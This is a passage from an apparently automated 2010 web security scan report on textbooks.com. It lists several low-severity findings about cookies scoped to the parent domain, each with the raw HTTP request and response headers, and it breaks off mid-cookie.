Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=wVCAnSNMnugJPpqPvFnYLMkeWndthnmqOhEEEMhiZx7wwIrip2hgQbExDho5rACzBkbkz%2B3tboQXXlEDqY88uSi9toJS5amCgvJPhU4%2B6u9GSdi8%2BPyG%2FPHQvDdA4iaiM3q14eVdOOwqGm9iho7gvHyDXRxe4e8yVF5u%2BLLtpF%2BNU9xtvy8uIaYtSKwPHOXe95vJZ2sxZ61yI4Vil5U6Xm6KDiMccJ5ge%2B9E9bjkdpVc0NujtdUwLCCL3z47t7PtcP4msfxpne4hgQ%2FYWGoFG9MoHHDeLG6luMmQtuxDrxl3MR9%2FAtb4xeckgUoU44e9SBigB344iGRmTf%2BtNjNfC0ykRdE6VebMxy6jhHj9gJBJsgt2ntC713Paqp3C%2FJAUgP0Br3ythzZAz7D6iFMtMNBzDo4Fl4xEuitZ2lOR7sXmQietPoNi1WISNuxDA3icHt1jTdPegalrRpEOjCmezWLHTNmCa0b1Qyr4ttsiU0p57ceZSAYRXXLoKMcL0zlkYnxPefNKQEVldegCt8IiE3D6VSetpkpM0C%2Fw9uwRe1L%2BeeaNNQZOCg1UmKrg92X8Nq3rzRqwZ48mZ8FbhxwZmmYSH44A9%2BSsUgoj6D4d4acf2cz2kIKi%2B8jLdUfP%2B0Ps6wpjtrbRhL%2FLDs7FEVzfy2BgzumkfGlb%2Bdc4cX3MrlwJNwTUp2qBlPFz8yAEmKxgET5qgaqGUPyX9U%2BMyc8kDwxtK5wyU%2FY1AQEzWn6WaFz%2Fe2iFwZKmDXUKmphRky1llznv%2BlpxbUSqLjBMUGG0scgpl5cZM3yhD7J0OKv4N%2BYEXkTZEFCHS5nkl%2BOo4FouixU%2BYQdKUi%2BmVxi%2BUvD9w1aYsjz6%2BNoMycuC4w%2BeDttlVLzyrLIjJq%2FibjXg72tvZAHkgRCGVL79zhZdj%2BNJxB%2BdE%2BD063jHaMboSA00YzWTOxLBG0Y1T0FI3DDr945czdlm%2FhXsxYdsUWGBE78jwuCvv4uyrPPUy2MSA0%2BY3S%2BQbz1HW7RDjRpTR%2Bu8iklBcRjxymy2ni4%2BibkO%2FBu%2B%2FEg2YATkLrcAwAvPMsssQFrbB%2FBZknDBAdfO%2FeIGdcFruitxdNw%2BBgS9C4Yem0urLAM1Ufx98XKKFEOg6KItVaExFRTJpUJBDEx3e9izECdNY5EJz2AdN3BbCdgCVZCjIlD78CQcgQQljR6vOrpi8pYFeBJ7t9G0rvLfZdyljwoeXFt0xiVNXwNwwb6U2hZEewgXRtwsR%2FYbzDj2xs%2Fx2V2q%2Fz9nRSUpCrtZ%2FMw%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=H2iNa2p5mG9uGr594ec%3D; expires=Mon, 26-Dec-2011 13:52:01 GMT; path=/; domain=.textbooks.com
Content-Length: 125397


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.14. http://www.textbooks.com/Catalog/J/Law-and-Criminal-Justice.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/J/Law-and-Criminal-Justice.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/J/Law-and-Criminal-Justice.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=GiHxY1D3cco5MVEkJIPPzVJuChM3fY39LY0RqwQktwWvsjTa0JW2BsknacfepGmlFDIZbbqDxckkx7cS%2B2gpBVd81euP6li0UkLy4rhaA%2Bodl97BdkV%2FNWgvhpwdKClEa6%2BAtfXODXEjew%2B9zK8CWS0yYQk57HF%2FnqvaSCctClM%2BIvvJZqIx%2FeNhi2pB7ep4zZ2njrU6BryD7vlbHDKSWd0bp4zA9mC8VfRHw0tVL3BBHcm2uY9Sevw5VFDyiGx1OEqQrxHi6tAC4D1DuZrcv4DzoyNLtKQWJuWID%2F5qJhubasF%2Bm28PpefqDT5cYODfBNRkKZmIa%2FUFQ%2FX2Qbr8CP0VhjYF12bO%2BxxTRKvAcqkXYmALAwnnee4IcJUVSicNatp1mwue8oTX1n7YFTQB10OyP3whu4fkDusZhf9pCKxG9JYbsFbb3dIFtzrtS74XTNXHE%2BomeT%2FLpL4ivx2QD02pSPCb%2BWPNQAe23fmkcONLpzuY6Omfgsdh3paEJb6jYOVvb9mjERi6Df9TXSE1OT98M2ca%2F0KExDmuLmLdIfNWK7vm%2FG2uznIQv8oNMt3K4uJ0j%2BMxdyKq0lkgnm3300m7McnZyQV%2BwpM%2BOCXdpyrkzniMBkmcs%2BjGbxYVr%2FSqNHtICgvpQIiu6ijTVrgTyT2fL2W0kliEQ0dHSxptuAICRwjSSUwbngIp3YgysuskgApfkMVgGvmOvFrDXf6bZ56tc01ItN%2BSIl8BuFqDlUeo5dtF2e8GUy3g5%2BNGkwId%2B%2BgUojbARJE2QQDDy1zdhAEjPbyXyMHTLA%2FJ6CU1crFQtGgYSbHQJDEArhhh1OLIsN9HSIOM9YX4IpDgE8zq0Vx2SdjrD74pL%2FxsdepKhsGQH6vOGMcv8JAEoHcNg1qtYDsU%2BRDQf7MmtzllrDVWi8FyM7nL63JML1PYKJu0RgPh935Po%2B1rYA%2BOCQgs8WMMhIODH77ncgKZ1v8MHkCe3SOzwSoWTaYOwcukdGlwbQE2Di9t1zECsrDQHQEScSodmEpNcDKuJroACTyFrDWhR4AV1Qtcli8UoAmW0T0wrX7O9%2FcsTGZFbaYdfw%2FWPpdq6zCXpj9%2FFdLOQroa6wGM88lqtvUZfEQU3XiZcChM7vky1TwVEf6XoBbuAtAiNO4JVrBOynByFkyFhRWgQTVGuzS323Qbx8nx8rqbA6zSxvUd%2FNUrxyBGaWeRe5N6OzorGK96RwA9bGF57MwpWxOX15ngqzMBLXcGiwGBlVkUjo%2FjUYwl0eyDR9%2B22xI%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=f39%2Fcfnu9ABQ2dwwkCM%3D; expires=Mon, 26-Dec-2011 13:52:15 GMT; path=/; domain=.textbooks.com
Content-Length: 146725


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.15. http://www.textbooks.com/Catalog/L/Languages-and-Literature.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/L/Languages-and-Literature.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/L/Languages-and-Literature.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=fG72Ywc0mypIeiUOVirDicOhdEiMF9lcHZcxvnN9IfzPHM7%2Fdj6%2Bxzm2f0ExlpWk4NOHPwyiv2FQjPkEPftsUH444oS5QEj%2F7FcoUz%2F2UiarYADCZBV7bvB3t5em%2FkVyJAd13MqPgRmdN2unHuNkWq9c%2F9dHAypavFCO6mEdofd1xL1RzdrXOI7y54sKeTyeqsSLcpiM0yw3lM%2Fl7pIsuPDE51V882MXAvAFaGcuq4oSE1p54pfpDlab5dOH%2F4NwnOo%2FoPR9mR4uKgizRaHMEfKeq8uePaO18QCdSAVHwGHiEHGPifga%2FilOSfknVYckULN12xqKaHN9wmROhId29IVAbZVf%2FWs9FTdrgnTc0sIVJH1b%2FyGV6M%2Fx7aJSPtZmpBbe9vKoCIk03t8P6P5H6z89b90540ITX%2BDzPg7nPblJrmhTlDQLUmFTM%2BqIVOs37TM2UIqGD24KmfexRXtcqEYwVdJ21gHCCRYTS9WyfWfzjON%2FQ0KAoZeMJsMlq0UsCFnJpmJqvGFORGTo1rnW2zOukOBvEllteDcqTU1q%2F%2F962rv93ZZ5vqDyhd%2FCUiCPa59XC%2Bn1JaiuiwlaZTZb%2B%2BArlq%2FwRRJgGrBzun%2BnCmsdVfGKn%2FWbd3pRcSA26F%2F39rjk0iSmvFHv8wa2FfpqH7nrqzrliOwI6qBbrkxrmFOoMnw1dZqVWZ4bb2Kfdxiy17Xo54RGASv10NyRfy%2BxNlpdpE4gPFJ2D0oJiUJgw96ju5zbbWWJg%2BAvVuMOQtxANnyUh8UlAxmfQnFx07C5io5AUYQLOI%2BoVD9dlQ8iEPMFE3KsPPH6madVkp5cTgPNWZXrbsoREQE88WSqo84sVQdSCp4IGUUuYx5Tamm8K5NYWfp4u1Xl1%2FCA1AiZqK%2BuWauYeTfEYgpjvbRaOTe41ZI31yjXfm9COC9PrMxQ9ErUmiZTBatdCSjZm6ppWKahFzB4eRopdj8pMlfqYQEH1iIsh3x1nHkCohb9Uh%2FD4m44o%2F13bg%2FyvaW9bPkF1IWVpPHxfkRlWqleiApjRZKmq6d53e28A4aMRtQ3NA8n%2F35Bu2jPSNcVbltPAFqXUMxQxeBcLO7Tk4wzYbu3Vn5JTsBORC2Qgk7G4a4bACsuyrCcH3zK089TfsN6WRQL7W3HTmNTgvaVDOTNRLDM9EvnASzyZ%2Btl9bPGmSxspfpY%2B%2BKX42HaojTJAQpfsRM4F5PpT0TfOkPuEO9ngIzhsYMyogEE%2FZUZp1ZCkzpFSr8sj74FUoPB3ZkZ9wgxwPM%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=WoYEsU7gFTAI7ua5Jys%3D; expires=Mon, 26-Dec-2011 13:52:14 GMT; path=/; domain=.textbooks.com
Content-Length: 117783


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.16. http://www.textbooks.com/Catalog/M/Math-and-Science.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/M/Math-and-Science.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/M/Math-and-Science.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=sRYyuJOpJ49sOCeckknOc8%2Fcs7RloEdBrMTr%2BX3T%2Bk%2Fv5pt27NdGyXLZyzHucDE8rXw4%2BfXsIr%2BCpN%2FCtHnuYa3NhYsfMh1QILSzU0MQIwQSWjzH5ToSGVnucX%2FtpdrAFMOj40dnQIioGkv0lpLlh2CtLgep8EcFQkfDXd37cLPs%2F5o4moXMvG1hY%2FbOER3D8irgpVWkuKtwTW0gZlJICUzR7Oim3d7liJhxzJRh58EQ8TeQF49kQik%2B2Pbf%2F6iOUswk13E3R98PHRxmemNdFbEzMQY7sP6LnVqvP20o3LEBQJ909k2KRX5f0sWvYiQ4KUC6qfPO99mDNegJMJWUKpPxiHIhJMTIROOzS6bsKoXb%2BvPsP%2FP03aFufgrd9rpQ98wYCRLSKVp7jJHiJKkZum3qkL03Q8x5xMjayRIZYSFjKoFzRnUPA9sws2plGK0DGgcF0hozx64Ui7XNou1VK7rjpta3BzKYl%2FZ3rWS0xgA9ui8uEG9w%2F%2FS1iwAQFXhbClubDGgBSWowXccDFQ6DLQJrPF6B2%2BqP2JO%2BSwAridOtOG5%2F2%2BxIu%2Frn46TQJ6rSxOPo0APQEJDeF9TjV0%2Fi6APMF%2F3NxURl%2Bkec6xnuRS%2BE%2BHEkwzDXMWkB%2FEl%2FgzpR1LDtO%2F5ngIlCKnsVkA0dvevJ9c5zYJuqsIBqxqa1XgiWjtXPKZ3ZjDSuiD0llOGuAuphsEA1Yud9z80eI3Q9ZOpWewU2MCt0ZZr%2Bsx%2Flr2atJm%2FxXiCajcLKoUvr%2B9cZn%2BF8TxjgxpW6IKoDYHZgvnKORQGFMkhNDX3gvCyMx50hbSffl8DAsRJ%2Bf4a%2BJLjp7AM8ZspOEc49d4eQTnb6JfEaWVHdBb46O1cs9zuiML%2FK1a4i9ejOJ0qnkaYq8G2xDWH8OATLTwnJVfLGfQSCPmeq8N%2FPLFNHozymdd%2FHoE0WPkEKlHtqjdmul2aFkV9xnXsnVgFGvVA7b4D5urcsmpRWX6ICBAYhWCl2IUfMwwFkgRlEu9fkC7Ei5P6ZVAuzjxTlz5gCui5CrEHqqRXT3b4NdXcpJRhQ9EagWvIhwfj4YnUzAuKByVFMouxFQ3D5np%2F2qYDux1fTn3nDdYxKKtzdYucTC5rC4W7NorEgxxk9oe5HyJ8TaWzd%2FAFnPtmL496iB%2BX%2BQnOVeu0viFPg8vSqeB1WbskKzuPDZ%2F5bS7WGLtt3dXY1FF5UtHoAl5rPM8e%2FDm%2FGbFP2LhOgr%2FZNbbfNBaPjEjC8ZgxgtIRAENMKOVS0CmSPihhzINs%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=RtMIGQwLOLtYgRObJxw%3D; expires=Mon, 26-Dec-2011 13:52:13 GMT; path=/; domain=.textbooks.com
Content-Length: 131056


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.17. http://www.textbooks.com/Catalog/P/Medicine.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/P/Medicine.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/P/Medicine.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4